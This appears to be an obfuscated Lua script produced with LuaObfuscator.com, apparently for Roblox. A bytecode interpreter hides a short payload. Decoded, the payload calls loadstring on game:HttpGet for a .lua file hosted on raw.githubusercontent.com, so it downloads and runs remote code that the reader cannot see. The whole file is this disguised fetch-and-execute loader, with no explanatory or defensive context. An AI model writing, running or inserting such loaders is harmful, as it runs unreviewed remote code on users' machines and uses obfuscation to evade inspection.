--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v86=0;while true do if (v86==0) then v19=v0(v3(v30,1,1));return "";end end else local v87=0;local v88;while true do if (v87==0) then v88=v2(v0(v30,16));if v19 then local v128=v5(v88,v19);v19=nil;return v128;else return v88;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v89=0 -0 ;local v90;while true do if (v89==((0 -0) -0)) then v90=(v31/(2^(v32-(1 -0))))%((4 -2)^(((v33-(620 -(555 + 64))) -(v32-(932 -(857 + 74)))) + (569 -(367 + 201)))) ;return v90-(v90%1) ;end end else local v91=927 -(214 + 713) ;local v92;while true do if (v91==(0 + 0)) then v92=((1066 -(68 + 997)) + 1)^(v32-(878 -((1552 -(226 + 1044)) + 595))) ;return (((v31%(v92 + v92))>=v92) and (1638 -(1523 + 114))) or (0 + 0) ;end end end end local function v21() local v34=0 -0 ;local v35;while true do if (v34==(118 -(32 + 85))) then return v35;end if (v34==(0 -(0 -0))) then v35=v1(v16,v18,v18);v18=v18 + 1 ;v34=1 + 0 ;end end end local function v22() local v36,v37=v1(v16,v18,v18 + (352 -(87 + 263)) );v18=v18 + (182 -(67 + 113)) ;return (v37 * 256) + v36 ;end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + 3 );v18=v18 + 3 + 1 ;return (v41 * 16777216) + (v40 * (160901 -95365)) + (v39 * (189 + 67)) + v38 ;end local function v24() local v42=0 -(0 -0) ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if ((438 -(145 + 293))==v42) then v43=v23();v44=v23();v42=953 -(802 + 150) ;end if ((5 -(11 -8))==v42) then v47=v20(v44,37 -16 ,10 + 21 );v48=((v20(v44,24 + 8 )==(773 -((884 -683) + 571))) and  -(1139 -(116 + 1022))) or (998 -(915 + 1 + 81)) ;v42=8 -5 ;end if (v42==(2 + 1)) then if (v47==(0 -0)) then if (v46==(1187 -(1069 + 118))) then return v48 * ((675 + 184) -(739 + 75 + 45)) ;else v47=(1057 -(87 + 968)) -1 ;v45=0 + 0 ;end elseif (v47==(724 + 1323)) then return ((v46==(0 -0)) and (v48 * ((1 + 0)/(0 -0)))) or (v48 * NaN) ;end return v8(v48,v47-((4753 -2650) -(1020 + 60)) ) * (v45 + (v46/((2 + 0)^(843 -((1781 -(447 + 966)) + 423))))) ;end if (v42==(3 -(5 -3))) then v45=19 -((1827 -(1703 + 114)) + 8) ;v46=(v20(v44,3 -2 ,462 -((1117 -(376 + 325)) + 26) ) * ((1915 -(1789 + 124))^(102 -70))) + v43 ;v42=1 + 1 ;end end end local function v25(v49) local v50=0 -0 ;local v51;local v52;while true do if ((8 -5)==v50) then return v6(v52);end if (v50==(1 + 0)) then v51=v3(v16,v18,(v18 + v49) -(2 -(1 + 0)) );v18=v18 + v49 ;v50=16 -(9 + 5) ;end if (v50==(378 -(85 + 291))) then v52={};for v112=1266 -(243 + 1022) , #v51 do v52[v112]=v2(v1(v3(v51,v112,v112)));end v50=3;end if (v50==(0 -0)) then v51=nil;if  not v49 then local v118=0;while true do if (v118==(0 + 0)) then v49=v23();if (v49==0) then return "";end break;end end end v50=(1435 -(163 + 91)) -(1123 + 57) ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return function(v93,v94,v95,v96,v97,v98,v99,v100) local v93=(function() return 0;end)();local v94=(function() return;end)();local v95=(function() return;end)();while true do if (v93== #"/") then if (v94== #"|") then v95=(function() return v96()~=(0 -0) ;end)();elseif (v94==2) then v95=(function() return v97();end)();elseif (v94~= #"-19") then else v95=(function() return v98();end)();end v99[v100]=(function() return v95;end)();break;end if (v93~=(0 + 0)) then else local v120=(function() return 1384 -(746 + 638) ;end)();local v121=(function() return;end)();while true do if (v120==(0 + 0)) then v121=(function() return 700 -(271 + 429) ;end)();while true do if ((1 + 0)==v121) then v93=(function() return  #"\\";end)();break;end if (v121==(0 -0)) then v94=(function() return v96();end)();v95=(function() return nil;end)();v121=(function() return 342 -(218 + 123) ;end)();end end break;end end end end return v93,v94,v95,v96,v97,v98,v99,v100;end;end)();local v54=(function() return function(v101,v102,v103) local v104=(function() return 0;end)();local v105=(function() return;end)();while true do if (v104~=(1581 -(1535 + 46))) then else v105=(function() return 0 + 0 ;end)();while true do if (v105~=0) then else local v129=(function() return 0;end)();while true do if (v129==0) then v101[v102-#"[" ]=(function() return v103();end)();return v101,v102,v103;end end end end break;end end end;end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {};end)();local v58=(function() return {v55,v56,nil,v57};end)();local v59=(function() return v23();end)();local v60=(function() return {};end)();for v68= #"\\",v59 do FlatIdent_68E92,Type,Cons,v21,v24,v25,v60,v68=(function() return v53(FlatIdent_68E92,Type,Cons,v21,v24,v25,v60,v68);end)();end v58[ #"-19"]=(function() return v21();end)();for v69= #"]",v23() do local v70=(function() return v21();end)();if (v20(v70, #"[", #"/")==(0 + 0)) then local v108=(function() return 560 -(306 + 254) ;end)();local v109=(function() return;end)();local v110=(function() return;end)();local v111=(function() return;end)();while true do if (v108==(1 + 1)) then if (v20(v110, #".", #":")== #"}") then v111[2]=(function() return v60[v111[3 -1 ]];end)();end if (v20(v110,1469 -(899 + 568) ,2)== #"]") then v111[ #"gha"]=(function() return v60[v111[ #"asd"]];end)();end v108=(function() return 2 + 1 ;end)();end if (v108==1) then local v124=(function() return 0 + 0 ;end)();local v125=(function() return;end)();while true do if (v124~=0) then else v125=(function() return 0 -0 ;end)();while true do if (v125~=(0 + 0)) then else v111=(function() return {v22(),v22(),nil,nil};end)();if (v109==(290 -(60 + 230))) then local v172=(function() return 0;end)();local v173=(function() return;end)();while true do if (v172~=(572 -(426 + 146))) then else v173=(function() return 0 + 0 ;end)();while true do if (v173==(529 -(406 + 123))) then v111[ #"nil"]=(function() return v22();end)();v111[ #"xnxx"]=(function() return v22();end)();break;end end break;end end elseif (v109== #"/") then v111[ #"nil"]=(function() return v23();end)();elseif (v109==(1 + 1)) then v111[ #"91("]=(function() return v23() -((1458 -(282 + 1174))^(827 -(569 + 242))) ;end)();elseif (v109~= #"-19") then else local v183=(function() return 0 + 0 ;end)();local v184=(function() return;end)();while true do if (v183==(0 -0)) then v184=(function() return 0 + 0 ;end)();while true do if (v184~=(0 + 0)) then else v111[ #"gha"]=(function() return v23() -(2^(1040 -(706 + 318))) ;end)();v111[ #"?id="]=(function() return v22();end)();break;end end break;end end end v125=(function() return 1;end)();end if (v125==(1252 -(721 + 530))) then v108=(function() return 5 -3 ;end)();break;end end break;end end end if (v108==(1903 -(106 + 1794))) then if (v20(v110, #"nil", #"asd")== #">") then v111[ #"http"]=(function() return v60[v111[ #".com"]];end)();end v55[v69]=(function() return v111;end)();break;end if (v108==(0 + 0)) then local v127=(function() return 0 + 0 ;end)();while true do if (v127~=(1272 -(945 + 326))) then else v108=(function() return 1;end)();break;end if (v127~=0) then else v109=(function() return v20(v70,2, #"asd");end)();v110=(function() return v20(v70, #"0836",14 -8 );end)();v127=(function() return 1;end)();end end end end end end for v71= #">",v23() do v56,v71,v28=(function() return v54(v56,v71,v28);end)();end return v58;end local function v29(v62,v63,v64) local v65=v62[115 -(4 + 110) ];local v66=v62[586 -(57 + 527) ];local v67=v62[1430 -(41 + 1386) ];return function(...) local v72=v65;local v73=v66;local v74=v67;local v75=v27;local v76=1;local v77= -1;local v78={};local v79={...};local v80=v12("#",...) -(104 -(17 + 86)) ;local v81={};local v82={};for v106=0 + (731 -(476 + 255)) ,v80 do if (v106>=v74) then v78[v106-v74 ]=v79[v106 + (1 -0) ];else v82[v106]=v79[v106 + (2 -1) ];end end local v83=(v80-v74) + (167 -((1252 -(369 + 761)) + 44)) ;local v84;local v85;while true do local v107=0 -0 ;while true do if (((3 -2)==v107) or (2087>2372)) then if (v85<=(3 + 0 + 0)) then if (v85<=1) then if (v85==(0 + 0)) then v82[v84[3 -1 ]]=v64[v84[68 -(30 + 35) ]];else do return;end end elseif (v85>(2 + 0)) then local v136=(2282 -1025) -(1043 + 214) ;local v137;local v138;local v139;local v140;while true do if (v136==((5 -2) -2)) then v77=(v139 + v137) -(1213 -(323 + 889)) ;v140=0 -0 ;v136=2;end if ((v136==(580 -(361 + 219))) or (4445<4149)) then v137=v84[(560 -(64 + 174)) -(53 + 267) ];v138,v139=v75(v82[v137](v13(v82,v137 + 1 + 0 + 0 ,v84[416 -(15 + 398) ])));v136=(1455 -472) -(18 + 964) ;end if (v136==(7 -5)) then for v175=v137,v77 do local v176=0 + 0 ;while true do if ((0 + 0)==v176) then v140=v140 + 1 ;v82[v175]=v138[v140];break;end end end break;end end else local v141=v84[852 -(20 + 830) ];local v142=v82[v84[(339 -(144 + 192)) + 0 ]];v82[v141 + ((343 -(42 + 174)) -(116 + 10)) ]=v142;v82[v141]=v142[v84[1 + 3 ]];end elseif (v85<=(743 -(408 + 134 + 196))) then if ((v85>(8 -4)) or (1818==85)) then local v146;local v147,v148;local v149;local v150;v82[v84[2]]={};v76=v76 + 1 ;v84=v72[v76];v82[v84[1 + 1 ]]=v64[v84[3]];v76=v76 + 1 + 0 ;v84=v72[v76];v82[v84[2]]=v64[v84[2 + 0 + 1 ]];v76=v76 + (2 -1) ;v84=v72[v76];v150=v84[4 -2 ];v149=v82[v84[1554 -(1126 + 181 + 244) ]];v82[v150 + (406 -(118 + (1791 -(363 + 1141)))) ]=v149;v82[v150]=v149[v84[15 -11 ]];v76=v76 + ((2702 -(1183 + 397)) -(118 + 1003)) ;v84=v72[v76];v82[v84[2]]=v84[8 -(15 -10) ];v76=v76 + (378 -(142 + 235)) ;v84=v72[v76];v150=v84[9 -7 ];v147,v148=v75(v82[v150](v13(v82,v150 + 1 + 0 ,v84[3])));v77=(v148 + v150) -(978 -(553 + 311 + 113)) ;v146=0 -0 ;for v166=v150,v77 do v146=v146 + 1 ;v82[v166]=v147[v146];end v76=v76 + 1 + 0 ;v84=v72[v76];v150=v84[2 + 0 ];v82[v150]=v82[v150](v13(v82,v150 + 1 + 0 ,v77));v76=v76 + 1 + 0 ;v84=v72[v76];v82[v84[2 + 0 ]]();v76=v76 + (2 -(1 + 0)) ;v84=v72[v76];do return;end else local v164=v84[5 -3 ];v82[v164]=v82[v164](v13(v82,v164 + (2 -1) ,v77));end elseif (v85<=(2 + 4)) then v82[v84[9 -7 ]]();elseif (v85==((2735 -(1913 + 62)) -(239 + 324 + 190))) then v82[v84[1 + 1 ]]={};else v82[v84[1331 -(797 + 532) ]]=v84[3 + 0 ];end v76=v76 + 1 ;break;end if ((630<2127) and (v107==(0 + 0))) then v84=v72[v76];v85=v84[1];v107=2 -1 ;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574035F3Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F746F6269343337612F536372697074732F726566732F68656164732F6D61696E2F343363326137633731663631623065362Q613137346337332E6C756100094Q00057Q00122Q000100013Q00122Q000200023Q00202Q00020002000300122Q000400046Q000200046Q00013Q00024Q0001000100016Q00017Q00",v9(),...)
